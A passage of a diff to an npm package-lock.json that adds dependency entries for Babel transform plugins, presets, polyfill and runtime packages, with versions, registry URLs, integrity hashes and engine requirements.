">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-object-rest-spread": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-object-rest-spread/-/plugin-transform-object-rest-spread-7.24.7.tgz", + "integrity": "sha512-4QrHAr0aXQCEFni2q4DqKLD31n2DL+RxcwnNjDFkSG0eNQ/xCavnRkfCUjsyqGC2OviNJvZOF/mQqZBw7i2C5Q==", + "dev": true, + "dependencies": { + "@babel/helper-compilation-targets": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-object-rest-spread": "^7.8.3", + "@babel/plugin-transform-parameters": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-object-super": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-object-super/-/plugin-transform-object-super-7.24.7.tgz", + "integrity": "sha512-A/vVLwN6lBrMFmMDmPPz0jnE6ZGx7Jq7d6sT/Ev4H65RER6pZ+kczlf1DthF5N0qaPHBsI7UXiE8Zy66nmAovg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-replace-supers": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-optional-catch-binding": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-optional-catch-binding/-/plugin-transform-optional-catch-binding-7.24.7.tgz", + "integrity": "sha512-uLEndKqP5BfBbC/5jTwPxLh9kqPWWgzN/f8w6UwAIirAEqiIVJWWY312X72Eub09g5KF9+Zn7+hT7sDxmhRuKA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-optional-catch-binding": "^7.8.3" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-optional-chaining": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-optional-chaining/-/plugin-transform-optional-chaining-7.24.8.tgz", + "integrity": "sha512-5cTOLSMs9eypEy8JUVvIKOu6NgvbJMnpG62VpIHrTmROdQ+L5mDAaI40g25k5vXti55JWNX5jCkq3HZxXBQANw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7", + "@babel/plugin-syntax-optional-chaining": "^7.8.3" + }, + "engines": { + "node": 
">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-parameters": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-parameters/-/plugin-transform-parameters-7.24.7.tgz", + "integrity": "sha512-yGWW5Rr+sQOhK0Ot8hjDJuxU3XLRQGflvT4lhlSY0DFvdb3TwKaY26CJzHtYllU0vT9j58hc37ndFPsqT1SrzA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-private-methods": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-private-methods/-/plugin-transform-private-methods-7.24.7.tgz", + "integrity": "sha512-COTCOkG2hn4JKGEKBADkA8WNb35TGkkRbI5iT845dB+NyqgO8Hn+ajPbSnIQznneJTa3d30scb6iz/DhH8GsJQ==", + "dev": true, + "dependencies": { + "@babel/helper-create-class-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-private-property-in-object": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-private-property-in-object/-/plugin-transform-private-property-in-object-7.24.7.tgz", + "integrity": "sha512-9z76mxwnwFxMyxZWEgdgECQglF2Q7cFLm0kMf8pGwt+GSJsY0cONKj/UuO4bOH0w/uAel3ekS4ra5CEAyJRmDA==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-create-class-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/plugin-syntax-private-property-in-object": "^7.14.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-property-literals": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-property-literals/-/plugin-transform-property-literals-7.24.7.tgz", + "integrity": "sha512-EMi4MLQSHfd2nrCqQEWxFdha2gBCqU4ZcCng4WBGZ5CJL4bBRW0ptdqqDdeirGZcpALazVVNJqRmsO8/+oNCBA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-constant-elements": { + "version": "7.23.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-constant-elements/-/plugin-transform-react-constant-elements-7.23.3.tgz", + "integrity": "sha512-zP0QKq/p6O42OL94udMgSfKXyse4RyJ0JqbQ34zDAONWjyrEsghYEyTSK5FIpmXmCpB55SHokL1cRRKHv8L2Qw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.22.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-display-name": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-display-name/-/plugin-transform-react-display-name-7.24.7.tgz", + "integrity": "sha512-H/Snz9PFxKsS1JLI4dJLtnJgCJRoo0AUm3chP6NYr+9En1JMKloheEiLIhlp5MDVznWo+H3AAC1Mc8lmUEpsgg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-inline-elements": { + "version": "7.23.3", + "resolved": 
"https://registry.npmjs.org/@babel/plugin-transform-react-inline-elements/-/plugin-transform-react-inline-elements-7.23.3.tgz", + "integrity": "sha512-NM86KpgxSSvk+GG/PiTBCw386OYdcpLRM6jngy84U7dsZKdtRQSud6BRxSzvuoQmP9r7b7V6X4P9PJjsWVr9mA==", + "dev": true, + "dependencies": { + "@babel/helper-builder-react-jsx": "^7.22.10", + "@babel/helper-plugin-utils": "^7.22.5" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-jsx": { + "version": "7.25.2", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-jsx/-/plugin-transform-react-jsx-7.25.2.tgz", + "integrity": "sha512-KQsqEAVBpU82NM/B/N9j9WOdphom1SZH3R+2V7INrQUH+V9EBFwZsEJl8eBIVeQE62FxJCc70jzEZwqU7RcVqA==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-module-imports": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/plugin-syntax-jsx": "^7.24.7", + "@babel/types": "^7.25.2" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-jsx-development": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-jsx-development/-/plugin-transform-react-jsx-development-7.24.7.tgz", + "integrity": "sha512-QG9EnzoGn+Qar7rxuW+ZOsbWOt56FvvI93xInqsZDC5fsekx1AlIO4KIJ5M+D0p0SqSH156EpmZyXq630B8OlQ==", + "dev": true, + "dependencies": { + "@babel/plugin-transform-react-jsx": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-react-pure-annotations": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-react-pure-annotations/-/plugin-transform-react-pure-annotations-7.24.7.tgz", + "integrity": "sha512-PLgBVk3fzbmEjBJ/u8kFzOqS9tUeDjiaWud/rRym/yjCo/M9cASPlnrd2ZmmZpQT40fOOrvR8jh+n8jikrOhNA==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-regenerator": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-regenerator/-/plugin-transform-regenerator-7.24.7.tgz", + "integrity": "sha512-lq3fvXPdimDrlg6LWBoqj+r/DEWgONuwjuOuQCSYgRroXDH/IdM1C0IZf59fL5cHLpjEH/O6opIRBbqv7ELnuA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "regenerator-transform": "^0.15.2" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-reserved-words": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-reserved-words/-/plugin-transform-reserved-words-7.24.7.tgz", + "integrity": "sha512-0DUq0pHcPKbjFZCfTss/pGkYMfy3vFWydkUBd9r0GHpIyfs2eCDENvqadMycRS9wZCXR41wucAfJHJmwA0UmoQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-shorthand-properties": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-shorthand-properties/-/plugin-transform-shorthand-properties-7.24.7.tgz", + "integrity": 
"sha512-KsDsevZMDsigzbA09+vacnLpmPH4aWjcZjXdyFKGzpplxhbeB4wYtury3vglQkg6KM/xEPKt73eCjPPf1PgXBA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-spread": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-spread/-/plugin-transform-spread-7.24.7.tgz", + "integrity": "sha512-x96oO0I09dgMDxJaANcRyD4ellXFLLiWhuwDxKZX5g2rWP1bTPkBSwCYv96VDXVT1bD9aPj8tppr5ITIh8hBng==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-sticky-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-sticky-regex/-/plugin-transform-sticky-regex-7.24.7.tgz", + "integrity": "sha512-kHPSIJc9v24zEml5geKg9Mjx5ULpfncj0wRpYtxbvKyTtHCYDkVE3aHQ03FrpEo4gEe2vrJJS1Y9CJTaThA52g==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-template-literals": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-template-literals/-/plugin-transform-template-literals-7.24.7.tgz", + "integrity": "sha512-AfDTQmClklHCOLxtGoP7HkeMw56k1/bTQjwsfhL6pppo/M4TOBSq+jjBUBLmV/4oeFg4GWMavIl44ZeCtmmZTw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-typeof-symbol": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-typeof-symbol/-/plugin-transform-typeof-symbol-7.24.8.tgz", + "integrity": "sha512-adNTUpDCVnmAE58VEqKlAA6ZBlNkMnWD0ZcW76lyNFN3MJniyGFZfNwERVk8Ap56MCnXztmDr19T4mPTztcuaw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-typescript": { + "version": "7.25.2", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-typescript/-/plugin-transform-typescript-7.25.2.tgz", + "integrity": "sha512-lBwRvjSmqiMYe/pS0+1gggjJleUJi7NzjvQ1Fkqtt69hBa/0t1YuW/MLQMAPixfwaQOHUXsd6jeU3Z+vdGv3+A==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-create-class-features-plugin": "^7.25.0", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7", + "@babel/plugin-syntax-typescript": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-unicode-escapes": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-escapes/-/plugin-transform-unicode-escapes-7.24.7.tgz", + "integrity": "sha512-U3ap1gm5+4edc2Q/P+9VrBNhGkfnf+8ZqppY71Bo/pzZmXhhLdqgaUl6cuB07O1+AQJtCLfaOmswiNbSQ9ivhw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + 
"@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-unicode-property-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-property-regex/-/plugin-transform-unicode-property-regex-7.24.7.tgz", + "integrity": "sha512-uH2O4OV5M9FZYQrwc7NdVmMxQJOCCzFeYudlZSzUAHRFeOujQefa92E74TQDVskNHCzOXoigEuoyzHDhaEaK5w==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-unicode-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-regex/-/plugin-transform-unicode-regex-7.24.7.tgz", + "integrity": "sha512-hlQ96MBZSAXUq7ltkjtu3FJCCSMx/j629ns3hA3pXnBXjanNP0LHi+JpPeA81zaWgVK1VGH95Xuy7u0RyQ8kMg==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-unicode-sets-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-sets-regex/-/plugin-transform-unicode-sets-regex-7.24.7.tgz", + "integrity": "sha512-2G8aAvF4wy1w/AGZkemprdGMRg5o6zPNhbHVImRz3lss55TYCBd6xStN19rt8XJHq20sqV0JbyWjOWwQRwV/wg==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/polyfill": { + "version": "7.12.1", + "resolved": "https://registry.npmjs.org/@babel/polyfill/-/polyfill-7.12.1.tgz", + "integrity": "sha512-X0pi0V6gxLi6lFZpGmeNa4zxtwEmCs42isWLNjZZDE0Y8yVfgu0T2OAHlzBbdYlqbW/YXVvoBHpATEM+goCj8g==", + "deprecated": "🚨 This package has been deprecated in favor of separate inclusion of a polyfill and regenerator-runtime (when needed). See the @babel/polyfill docs (https://babeljs.io/docs/en/babel-polyfill) for more information.", + "dev": true, + "dependencies": { + "core-js": "^2.6.5", + "regenerator-runtime": "^0.13.4" + } + }, + "node_modules/@babel/polyfill/node_modules/core-js": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/core-js/-/core-js-2.6.12.tgz", + "integrity": "sha512-Kb2wC0fvsWfQrgk8HU5lW6U/Lcs8+9aaYcy4ZFc6DDlo4nZ7n70dEgE5rtR0oG6ufKDUnrwfWL1mXR5ljDatrQ==", + "deprecated": "core-js@<3.23.3 is no longer maintained and not recommended for usage due to the number of issues. Because of the V8 engine whims, feature detection in old core-js versions could cause a slowdown up to 100x even if nothing is polyfilled. Some versions have web compatibility issues. 
Please, upgrade your dependencies to the actual version of core-js.", + "dev": true, + "hasInstallScript": true + }, + "node_modules/@babel/preset-env": { + "version": "7.25.3", + "resolved": "https://registry.npmjs.org/@babel/preset-env/-/preset-env-7.25.3.tgz", + "integrity": "sha512-QsYW7UeAaXvLPX9tdVliMJE7MD7M6MLYVTovRTIwhoYQVFHR1rM4wO8wqAezYi3/BpSD+NzVCZ69R6smWiIi8g==", + "dev": true, + "dependencies": { + "@babel/compat-data": "^7.25.2", + "@babel/helper-compilation-targets": "^7.25.2", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-validator-option": "^7.24.8", + "@babel/plugin-bugfix-firefox-class-in-computed-class-key": "^7.25.3", + "@babel/plugin-bugfix-safari-class-field-initializer-scope": "^7.25.0", + "@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression": "^7.25.0", + "@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": "^7.24.7", + "@babel/plugin-bugfix-v8-static-class-fields-redefine-readonly": "^7.25.0", + "@babel/plugin-proposal-private-property-in-object": "7.21.0-placeholder-for-preset-env.2", + "@babel/plugin-syntax-async-generators": "^7.8.4", + "@babel/plugin-syntax-class-properties": "^7.12.13", + "@babel/plugin-syntax-class-static-block": "^7.14.5", + "@babel/plugin-syntax-dynamic-import": "^7.8.3", + "@babel/plugin-syntax-export-namespace-from": "^7.8.3", + "@babel/plugin-syntax-import-assertions": "^7.24.7", + "@babel/plugin-syntax-import-attributes": "^7.24.7", + "@babel/plugin-syntax-import-meta": "^7.10.4", + "@babel/plugin-syntax-json-strings": "^7.8.3", + "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", + "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", + "@babel/plugin-syntax-numeric-separator": "^7.10.4", + "@babel/plugin-syntax-object-rest-spread": "^7.8.3", + "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", + "@babel/plugin-syntax-optional-chaining": "^7.8.3", + "@babel/plugin-syntax-private-property-in-object": "^7.14.5", + "@babel/plugin-syntax-top-level-await": "^7.14.5", + "@babel/plugin-syntax-unicode-sets-regex": "^7.18.6", + "@babel/plugin-transform-arrow-functions": "^7.24.7", + "@babel/plugin-transform-async-generator-functions": "^7.25.0", + "@babel/plugin-transform-async-to-generator": "^7.24.7", + "@babel/plugin-transform-block-scoped-functions": "^7.24.7", + "@babel/plugin-transform-block-scoping": "^7.25.0", + "@babel/plugin-transform-class-properties": "^7.24.7", + "@babel/plugin-transform-class-static-block": "^7.24.7", + "@babel/plugin-transform-classes": "^7.25.0", + "@babel/plugin-transform-computed-properties": "^7.24.7", + "@babel/plugin-transform-destructuring": "^7.24.8", + "@babel/plugin-transform-dotall-regex": "^7.24.7", + "@babel/plugin-transform-duplicate-keys": "^7.24.7", + "@babel/plugin-transform-duplicate-named-capturing-groups-regex": "^7.25.0", + "@babel/plugin-transform-dynamic-import": "^7.24.7", + "@babel/plugin-transform-exponentiation-operator": "^7.24.7", + "@babel/plugin-transform-export-namespace-from": "^7.24.7", + "@babel/plugin-transform-for-of": "^7.24.7", + "@babel/plugin-transform-function-name": "^7.25.1", + "@babel/plugin-transform-json-strings": "^7.24.7", + "@babel/plugin-transform-literals": "^7.25.2", + "@babel/plugin-transform-logical-assignment-operators": "^7.24.7", + "@babel/plugin-transform-member-expression-literals": "^7.24.7", + "@babel/plugin-transform-modules-amd": "^7.24.7", + "@babel/plugin-transform-modules-commonjs": "^7.24.8", + "@babel/plugin-transform-modules-systemjs": "^7.25.0", + 
"@babel/plugin-transform-modules-umd": "^7.24.7", + "@babel/plugin-transform-named-capturing-groups-regex": "^7.24.7", + "@babel/plugin-transform-new-target": "^7.24.7", + "@babel/plugin-transform-nullish-coalescing-operator": "^7.24.7", + "@babel/plugin-transform-numeric-separator": "^7.24.7", + "@babel/plugin-transform-object-rest-spread": "^7.24.7", + "@babel/plugin-transform-object-super": "^7.24.7", + "@babel/plugin-transform-optional-catch-binding": "^7.24.7", + "@babel/plugin-transform-optional-chaining": "^7.24.8", + "@babel/plugin-transform-parameters": "^7.24.7", + "@babel/plugin-transform-private-methods": "^7.24.7", + "@babel/plugin-transform-private-property-in-object": "^7.24.7", + "@babel/plugin-transform-property-literals": "^7.24.7", + "@babel/plugin-transform-regenerator": "^7.24.7", + "@babel/plugin-transform-reserved-words": "^7.24.7", + "@babel/plugin-transform-shorthand-properties": "^7.24.7", + "@babel/plugin-transform-spread": "^7.24.7", + "@babel/plugin-transform-sticky-regex": "^7.24.7", + "@babel/plugin-transform-template-literals": "^7.24.7", + "@babel/plugin-transform-typeof-symbol": "^7.24.8", + "@babel/plugin-transform-unicode-escapes": "^7.24.7", + "@babel/plugin-transform-unicode-property-regex": "^7.24.7", + "@babel/plugin-transform-unicode-regex": "^7.24.7", + "@babel/plugin-transform-unicode-sets-regex": "^7.24.7", + "@babel/preset-modules": "0.1.6-no-external-plugins", + "babel-plugin-polyfill-corejs2": "^0.4.10", + "babel-plugin-polyfill-corejs3": "^0.10.4", + "babel-plugin-polyfill-regenerator": "^0.6.1", + "core-js-compat": "^3.37.1", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/preset-flow": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/preset-flow/-/preset-flow-7.25.9.tgz", + "integrity": "sha512-EASHsAhE+SSlEzJ4bzfusnXSHiU+JfAYzj+jbw2vgQKgq5HrUr8qs+vgtiEL5dOH6sEweI+PNt2D7AqrDSHyqQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.25.9", + "@babel/helper-validator-option": "^7.25.9", + "@babel/plugin-transform-flow-strip-types": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/preset-modules": { + "version": "0.1.6-no-external-plugins", + "resolved": "https://registry.npmjs.org/@babel/preset-modules/-/preset-modules-0.1.6-no-external-plugins.tgz", + "integrity": "sha512-HrcgcIESLm9aIR842yhJ5RWan/gebQUJ6E/E5+rf0y9o6oj7w0Br+sWuL6kEQ/o/AdfvR1Je9jG18/gnpwjEyA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.0.0", + "@babel/types": "^7.4.4", + "esutils": "^2.0.2" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/@babel/preset-react": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/preset-react/-/preset-react-7.24.7.tgz", + "integrity": "sha512-AAH4lEkpmzFWrGVlHaxJB7RLH21uPQ9+He+eFLWHmF9IuFQVugz8eAsamaW0DXRrTfco5zj1wWtpdcXJUOfsag==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-validator-option": "^7.24.7", + "@babel/plugin-transform-react-display-name": "^7.24.7", + "@babel/plugin-transform-react-jsx": "^7.24.7", + "@babel/plugin-transform-react-jsx-development": "^7.24.7", + "@babel/plugin-transform-react-pure-annotations": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + 
"node_modules/@babel/preset-typescript": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/preset-typescript/-/preset-typescript-7.24.7.tgz", + "integrity": "sha512-SyXRe3OdWwIwalxDg5UtJnJQO+YPcTfwiIY2B0Xlddh9o7jpWLvv8X1RthIeDOxQ+O1ML5BLPCONToObyVQVuQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-validator-option": "^7.24.7", + "@babel/plugin-syntax-jsx": "^7.24.7", + "@babel/plugin-transform-modules-commonjs": "^7.24.7", + "@babel/plugin-transform-typescript": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/register": { + "version": "7.24.6", + "resolved": "https://registry.npmjs.org/@babel/register/-/register-7.24.6.tgz", + "integrity": "sha512-WSuFCc2wCqMeXkz/i3yfAAsxwWflEgbVkZzivgAmXl/MxrXeoYFZOOPllbC8R8WTF7u61wSRQtDVZ1879cdu6w==", + "dev": true, + "dependencies": { + "clone-deep": "^4.0.1", + "find-cache-dir": "^2.0.0", + "make-dir": "^2.1.0", + "pirates": "^4.0.6", + "source-map-support": "^0.5.16" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/regjsgen": { + "version": "0.8.0", + "resolved": "https://registry.npmjs.org/@babel/regjsgen/-/regjsgen-0.8.0.tgz", + "integrity": "sha512-x/rqGMdzj+fWZvCOYForTghzbtqPDZ5gPwaoNGHdgDfF2QA/XZbCBp4Moo5scrkAMPhB7z26XM/AaHuIJdgauA==", + "dev": true + }, + "node_modules/@babel/runtime": { + "version": "7.23.2", + "resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.23.2.tgz", + "integrity": "sha512-mM8eg4yl5D6i3lu2QKPuPH4FArvJ8KhTofbE7jwMUv9KX5mBvwPAqnV3MlyBNqdp9RyRKP6Yck8TrfYrPvX3bg==", + "dependencies": { + "regenerator-runtime": "^0.14.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/runtime-corejs3": { + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/runtime-corejs3/-/runtime-corejs3-7.16.8.tgz", + "integrity": "sha512-3fKhuICS1lMz0plI5ktOE/yEtBRMVxplzRkdn6mJQ197XiY0JnrzYV0+Mxozq3JZ8SBV9Ecurmw1XsGbwOf+Sg==", + "dependencies": { + "core-js-pure": "^3.20.2", + "regenerator-runtime": "^0.13.4" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/runtime/node_modules/regenerator-runtime": { + "version": "0.14.0", + "resolved": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.14.0.tgz", + "integrity": "sha512-srw17NI0TUWHuGa5CFGGmhfNIeja30WMBfbslPNhf6JrqQlLN5gcrvig1oqPxiVaXb0oW0XRKtH6Nngs5lKCIA==" + }, + "node_modules/@babel/template": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.26.9.tgz", + "integrity": "sha512-qyRplbeIpNZhmzOysF/wFMuP9sctmh2cFzRAZOn1YapxBsE1i9bJIY586R/WBLfLcmcBlM8ROBiQURnnNy+zfA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.26.2", + "@babel/parser": "^7.26.9", + "@babel/types": "^7.26.9" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/traverse": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.26.9.tgz", + "integrity": "sha512-ZYW7L+pL8ahU5fXmNbPF+iZFHCv5scFak7MZ9bwaRPLUhHh7QQEMjZUg0HevihoqCM5iSYHN61EyCoZvqC+bxg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.26.2", + "@babel/generator": "^7.26.9", + "@babel/parser": "^7.26.9", + "@babel/template": "^7.26.9", + "@babel/types": "^7.26.9", + "debug": "^4.3.1", + "globals": "^11.1.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + 
